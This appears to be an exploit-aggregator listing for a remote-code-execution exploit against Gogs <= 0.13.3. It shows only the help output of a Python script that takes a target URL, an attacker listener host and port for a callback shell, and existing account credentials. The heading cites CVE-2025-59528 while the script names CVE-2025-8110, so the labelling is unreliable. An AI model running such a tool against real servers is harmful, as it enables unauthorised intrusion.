Share
## https://sploitus.com/exploit?id=CBC07C43-DD2F-5789-AB60-50FCEF7069A1
# RCE - CVE-2025-59528 Gogs <= 0.13.3 Exploit

```shellsession
$ python3 CVE-2025-8110.py -h
usage: CVE-2025-8110.py [-h] -u URL -lh HOST -lp PORT [-user USERNAME] [-pass PASSWORD] [-x]

CVE-2025-8110 Gogs Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Gogs base URL (e.g., http://127.0.0.1:3000)
  -lh, --host HOST      Attacker listener host
  -lp, --port PORT      Attacker listener port
  -user, --username USERNAME
                        Existing Gogs username
  -pass, --password PASSWORD
                        Existing Gogs password
  -x, --proxy           Use local proxy (localhost:8080)

```